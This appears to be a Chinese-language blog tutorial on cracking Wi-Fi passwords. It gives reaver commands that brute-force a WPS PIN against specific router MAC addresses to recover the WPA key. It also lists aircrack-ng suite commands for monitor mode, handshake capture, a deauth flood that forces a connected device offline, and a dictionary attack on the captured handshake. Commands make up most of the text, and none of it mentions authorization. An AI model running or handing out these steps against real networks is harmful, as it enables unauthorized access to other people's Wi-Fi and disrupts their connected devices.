抱歉,您的浏览器无法访问本站
本页面需要浏览器支持(启用)JavaScript
了解详情 >

拿 pin 码就可以直接跑出 WPA PSK

网卡监控模式

airmon-ng start wlan0  

扫描

wash -i wlan0mon

破 pin

            网卡          物理地址        信道
reaver -i wlan0mon -b 00:5A:13:40:AA:F8 -c 11 -vv -K 0

直接拿到 pin 了

通过 pin 获得 wifi 密码

            网卡          物理地址          pin码
reaver -i wlan0mon -b 78:A1:06:B6:2A:42 -p 92975934

附录

aircrack-ng - 命令清单

airmon-ng start [网卡] # 开启monitor模式

airodump-ng [网卡] # 捕获附件的wifi信息

airodump-ng -c [信道] --bssid [路由器MAC] -w [handshake-path] [网卡]

aireplay-ng -0 [攻击次数值] -c [某连接设备MAC] -a [路由器MAC] [网卡]

aircrack-ng -w [字典-path] [破解的目标握手包-path]

airmon-ng stop [网卡] # 退出monitor模式
ifconfig -a 查看网卡
airmon-ng start wlan0
airodump-ng wlan0mon

监听网络,完了 Ctrl + C 退出

主要参数说明:

# BSSID :路由器、AP的MAC地址
# PWR :信号强度,一看就是越小越强了
# Data :传输的数据大小,大的可能在下载或看视频什么的
# CH :无线信道,要看准
# ENC :加密协议,自WPA2协议爆出重大安全漏洞,现已经出WPA3,坐等更新
# ESSID :这个就不用多说了,wifi名称,有中文可能会出现乱码哈

目标有了,开始对其进行 cap 包的监听和获取,这里要让其中连接的设备重连才能抓包其握手包,可以慢慢等待,也可以使用 deauth 洪水攻击。

airodump-ng -c 9 --bssid 78:11:DC:10:4F:66 -w /root/handshake/ wlan0mon
# -w 后面的路径是存放握手包的

另起窗口,我们用 deauth 洪水攻击,让其中的一台设备掉线,它掉线后会自动连接(除非别人在 wifi 设置中勾选掉了自动连接)

aireplay-ng -0 20 -a 78:11:DC:10:4F:66 -c 6C:88:14:F2:47:8C  wlan0mon
# -0 death模式,20为攻击次数,也可以设为0,就是一直攻击
# -c 这里就是连接上的设备的MAC地址了,指定它,我们让它稳稳地掉线。

上字典(关键东西),让它慢慢破去吧

root@huan:~#aircrack-ng -w /root/wordlist.txt /root/handshake/-02.cap
推荐阅读
WLAN WLAN 交换网络基础 交换网络基础 以太网帧结构 以太网帧结构 杂记片段 杂记片段 数据转发过程 数据转发过程 Flume 的安装部署 Flume 的安装部署

留言区

Are You A Robot?